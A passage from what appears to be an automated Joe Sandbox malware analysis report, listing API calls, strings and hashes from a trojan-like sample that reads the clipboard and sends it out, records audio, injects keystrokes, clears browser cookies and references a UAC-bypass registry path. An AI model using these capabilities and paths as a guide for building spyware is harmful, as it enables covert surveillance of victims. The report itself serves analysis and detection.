                                                                  • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                                                  • Opcode Fuzzy Hash: 668acd623b90f3b0cdf34578d0f5251299bc4f70ab8d2d7e652f4e1ee58cd933
                                                                  • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 048F45C3
                                                                  • LoadLibraryA.KERNEL32(?), ref: 048F4605
                                                                  • LoadLibraryA.KERNEL32(?), ref: 048F4664
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 048F468C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad$AddressDirectoryProcSystem
                                                                  • String ID: %3A$`3A$ou
                                                                  • API String ID: 4217395396-4073855258
                                                                  • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                  • Instruction ID: 1516d43e6f2df8340b93864a7e9ac471c50c450d41fbfd52bece8002397c1136
                                                                  • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                                                                  • Instruction Fuzzy Hash: A331C771502315ABE720AF24DC44D9FB7EC9F88B55F450B26FE44D3210E778E9448AAA
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                                    • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
                                                                    • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                  • String ID: .part
                                                                  • API String ID: 1303771098-3499674018
                                                                  • Opcode ID: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
                                                                  • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                                                  • Opcode Fuzzy Hash: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
                                                                  • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 0044701E
                                                                  • __alloca_probe_16.LIBCMT ref: 00447056
                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042BAB6,?,?,?,00447215,00000001,00000001,?), ref: 004470A4
                                                                  • __alloca_probe_16.LIBCMT ref: 0044713B
                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                                                  • __freea.LIBCMT ref: 004471AB
                                                                    • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                                                  • __freea.LIBCMT ref: 004471B4
                                                                  • __freea.LIBCMT ref: 004471D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 3864826663-0
                                                                  • Opcode ID: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
                                                                  • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                                                  • Opcode Fuzzy Hash: 429851ce6ab608a1373ea908d8fe5c2358bbda3d7f1dde4b5ad8663d45493dac
                                                                  • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                                                  • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InputSend
                                                                  • String ID:
                                                                  • API String ID: 3431551938-0
                                                                  • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                  • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                                                  • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                  • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                                                  APIs
                                                                  • OpenClipboard.USER32 ref: 00414F41
                                                                  • EmptyClipboard.USER32 ref: 00414F4F
                                                                  • CloseClipboard.USER32 ref: 00414F55
                                                                  • OpenClipboard.USER32 ref: 00414F5C
                                                                  • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                  • CloseClipboard.USER32 ref: 00414F84
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                  • String ID:
                                                                  • API String ID: 2172192267-0
                                                                  • Opcode ID: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
                                                                  • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                                                  • Opcode Fuzzy Hash: e25419e6d8039f906f8e35a39bb69e24259a120ac2af4df386a8ba427cdc1a67
                                                                  • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                                                  APIs
                                                                  • _free.LIBCMT ref: 049274D9
                                                                  • _free.LIBCMT ref: 049274FD
                                                                  • _free.LIBCMT ref: 04927684
                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 04927696
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 0492770E
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 0492773B
                                                                  • _free.LIBCMT ref: 04927850
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                  • String ID:
                                                                  • API String ID: 314583886-0
                                                                  • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                                                  • Instruction ID: 37f879013edbabfadc139084e7af467b539708099db1e81021e1bb970828a61e
                                                                  • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                                                                  • Instruction Fuzzy Hash: 9AC12A71900265AFEB20DFF89E40AAEBBADEF81314F1405FAD485A7258E730AE45C751
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                                                  • __fassign.LIBCMT ref: 00447814
                                                                  • __fassign.LIBCMT ref: 0044782F
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                                                  • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                                                  • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                  • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                                                  • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                  • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                                                  APIs
                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,04928C64,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 04928531
                                                                  • __fassign.LIBCMT ref: 049285AC
                                                                  • __fassign.LIBCMT ref: 049285C7
                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 049285ED
                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,04928C64,00000000,?,?,?,?,?,?,?,?,?,04928C64,?), ref: 0492860C
                                                                  • WriteFile.KERNEL32(?,?,00000001,04928C64,00000000,?,?,?,?,?,?,?,?,?,04928C64,?), ref: 04928645
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: 974bdd1760e1fbed972c8c26fb927694832cee583c2e15cdbcc7b5b1c3d61954
                                                                  • Instruction ID: acda0ddb405abada737a86e1f99a3a226c0e9d9c45ed1812614d8949e2ceaeb6
                                                                  • Opcode Fuzzy Hash: 974bdd1760e1fbed972c8c26fb927694832cee583c2e15cdbcc7b5b1c3d61954
                                                                  • Instruction Fuzzy Hash: 28511A70A002159FDB10DFA8D944AEEBBF8EF08300F15467AE955E7251E770EA45CBA4
                                                                  APIs
                                                                  • connect.WS2_32(?,00000000,00000000), ref: 048E5658
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 048E5778
                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 048E5786
                                                                  • WSAGetLastError.WS2_32 ref: 048E5799
                                                                    • Part of subcall function 048FA272: GetLocalTime.KERNEL32(00000000), ref: 048FA28C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                  • String ID: Connection Failed: $TLS Handshake... |
                                                                  • API String ID: 994465650-1510355367
                                                                  • Opcode ID: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                                                  • Instruction ID: 7c55a2b5e56723eb234e7574eda5ad6f996ecc502905b2018659406f461e5861
                                                                  • Opcode Fuzzy Hash: b56ab407b7d85cc5e8983cef37c9724a1f5c45cc3ea0a996f87df1f4b9ef746f
                                                                  • Instruction Fuzzy Hash: A4410A21B006117BEA187BBECD1693D7725AB43258B400F59D502C3691FFE6BD2187D7
                                                                  APIs
                                                                  • _strftime.LIBCMT ref: 00401D30
                                                                    • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                  • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                                                  • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                                                  • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                  • String ID: %Y-%m-%d %H.%M$.wav
                                                                  • API String ID: 3809562944-3597965672
                                                                  • Opcode ID: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
                                                                  • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                                                  • Opcode Fuzzy Hash: 6970773257d7bd6b4a9ad9b6f82f9bce4b3c1b2460946ca6bb168bdaee054684
                                                                  • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                                                  APIs
                                                                    • Part of subcall function 00411F91: RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                    • Part of subcall function 00411F91: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                    • Part of subcall function 00411F91: RegCloseKey.KERNEL32(?), ref: 00411FDD
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                  • API String ID: 1133728706-4073444585
                                                                  • Opcode ID: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
                                                                  • Instruction ID: 9e227284a7a69f00510d3be81dd7cde1580ac9a58a9ca8fbd928e09bf644cbd9
                                                                  • Opcode Fuzzy Hash: 13b02dafbbb2df2509005d2ea6d237cbb7e060283ac4043076e9ae9448562644
                                                                  • Instruction Fuzzy Hash: CF21B170A4020556CB00FBE2CC97DEE7368AF51348F80013FB901772D2EB795A45C6DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
                                                                  • Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
                                                                  • Opcode Fuzzy Hash: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
                                                                  • Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269
                                                                  APIs
                                                                  • ShellExecuteW.SHELL32(00000000,004630AC,00000000,00469654,00469654,00000000), ref: 048E750D
                                                                  • ExitProcess.KERNEL32 ref: 048E751A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExecuteExitProcessShell
                                                                  • String ID: C:\Windows\SysWOW64\SndVol.exe$H"G$Software\Classes\mscfile\shell\open\command$origmsc
                                                                  • API String ID: 1124553745-1559122629
                                                                  • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                                                  • Instruction ID: 4b03cb411f6e22ab93019473aa06901611a3d5230657dfca2bcc54ff38ae1137
                                                                  • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                                                  • Instruction Fuzzy Hash: DE110B61A441056AF714B769EC12FBE3258DB02B05F100A59EA05E60C1FED47A0982DB
                                                                  APIs
                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00419407
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041940A
                                                                  Strings
                                                                  • http://geoplugin.net/json.gp, xrefs: 004193A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                                  • String ID: http://geoplugin.net/json.gp
                                                                  • API String ID: 3121278467-91888290
                                                                  • Opcode ID: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                                                  • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                                                                  • Opcode Fuzzy Hash: 7fcb56876af0f522e84ab7e8d8f64b5881d67df2ffb9a695aea30fd6e424dab6
                                                                  • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                                                                  APIs
                                                                    • Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A
                                                                  • _free.LIBCMT ref: 0044E128
                                                                    • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                                    • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                                                  • _free.LIBCMT ref: 0044E133
                                                                  • _free.LIBCMT ref: 0044E13E
                                                                  • _free.LIBCMT ref: 0044E192
                                                                  • _free.LIBCMT ref: 0044E19D
                                                                  • _free.LIBCMT ref: 0044E1A8
                                                                  • _free.LIBCMT ref: 0044E1B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                  • Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
                                                                  • Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
                                                                  • Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
                                                                  • SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                  • Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
                                                                  • Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
                                                                  • Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C
                                                                  APIs
                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
                                                                  • GetLastError.KERNEL32 ref: 0040AA28
                                                                  Strings
                                                                  • [Chrome Cookies not found], xrefs: 0040AA42
                                                                  • UserProfile, xrefs: 0040A9EE
                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
                                                                  • [Chrome Cookies found, cleared!], xrefs: 0040AA4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: DeleteErrorFileLast
                                                                  • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                  • API String ID: 2018770650-304995407
                                                                  • Opcode ID: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                                                  • Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
                                                                  • Opcode Fuzzy Hash: 72959d3c99de93e4222bab9abc487c3734757a9235bfdd9193e44ef0947d1452
                                                                  • Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F
                                                                  APIs
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                                                  • Sleep.KERNEL32(00002710), ref: 00418DBD
                                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                  • String ID: Alarm triggered$`ou
                                                                  • API String ID: 614609389-1879314875
                                                                  • Opcode ID: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                                                  • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                                                  • Opcode Fuzzy Hash: f3b2e6a196e006c08730a50f46cf1091306eb2f4cb3f358d521c73ccadf31b21
                                                                  • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 00438A09
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
                                                                  • __allrem.LIBCMT ref: 00438A3C
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
                                                                  • __allrem.LIBCMT ref: 00438A71
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 1992179935-0
                                                                  • Opcode ID: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                  • Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
                                                                  • Opcode Fuzzy Hash: e54fcd2a271a95563de48233a52a921a5b89548056e17f80f76cd68e5be4f8c8
                                                                  • Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 049197A1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049197BD
                                                                  • __allrem.LIBCMT ref: 049197D4
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 049197F2
                                                                  • __allrem.LIBCMT ref: 04919809
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04919827
                                                                  Memory Dump Source
